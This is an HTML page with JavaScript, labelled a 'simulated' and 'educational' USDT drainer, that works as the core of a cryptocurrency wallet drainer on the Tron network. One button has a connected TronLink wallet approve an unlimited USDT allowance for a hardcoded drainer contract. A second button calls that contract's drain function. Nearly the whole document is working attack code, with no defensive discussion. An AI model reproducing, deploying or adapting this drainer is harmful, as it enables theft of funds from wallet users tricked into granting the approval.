<!DOCTYPE html>
<html>
<head>
  <title>Approve & Drain USDT</title>
  <meta name="viewport" content="width=device-width, initial-scale=1">
  <style>
    body {
      font-family: Arial, sans-serif;
      text-align: center;
      margin: 40px;
    }
    button {
      padding: 10px 20px;
      font-size: 18px;
      margin: 20px;
      border-radius: 10px;
      border: none;
      background-color: #2c3e50;
      color: white;
    }
    button:hover {
      background-color: #34495e;
    }
  </style>
</head>
<body>
  <h2>Simulated USDT Drainer (Educational)</h2>
  <p>Connect TronLink and approve USDT access</p>

  <button onclick="approveUSDT()">Approve All USDT</button>
  <button onclick="drainUSDT()">Drain Approved USDT</button>

  <script>
    const usdtAddress = "TXLAQ63Xg1NAzckPwKHvzw7CSEmLMEqcdj"; // USDT TRC20 on Tron
    const drainerContractAddress = "TVm22VuHmhxAuxN9f1LfpmrJTWS8aAYG9R";

    async function approveUSDT() {
      if (!window.tronWeb || !tronWeb.defaultAddress.base58) {
        alert("Please connect TronLink first.");
        return;
      }
      const contract = await tronWeb.contract().at(usdtAddress);
      try {
        const result = await contract.approve(drainerContractAddress, "0xffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff").send();
        alert("Approved successfully! TX ID: " + result);
      } catch (e) {
        alert("Approval failed: " + e.message);
      }
    }

    async function drainUSDT() {
      if (!window.tronWeb || !tronWeb.defaultAddress.base58) {
        alert("Please connect TronLink first.");
        return;
      }
      const contract = await tronWeb.contract().at(drainerContractAddress);
      try {
        const result = await contract.drain(
          usdtAddress,
          tronWeb.defaultAddress.base58,
          "1000000000000000000000000000000"
        ).send();
        alert("Drain triggered! TX ID: " + result);
      } catch (e) {
        alert("Drain failed: " + e.message);
      }
    }
  </script>
</body>
</html>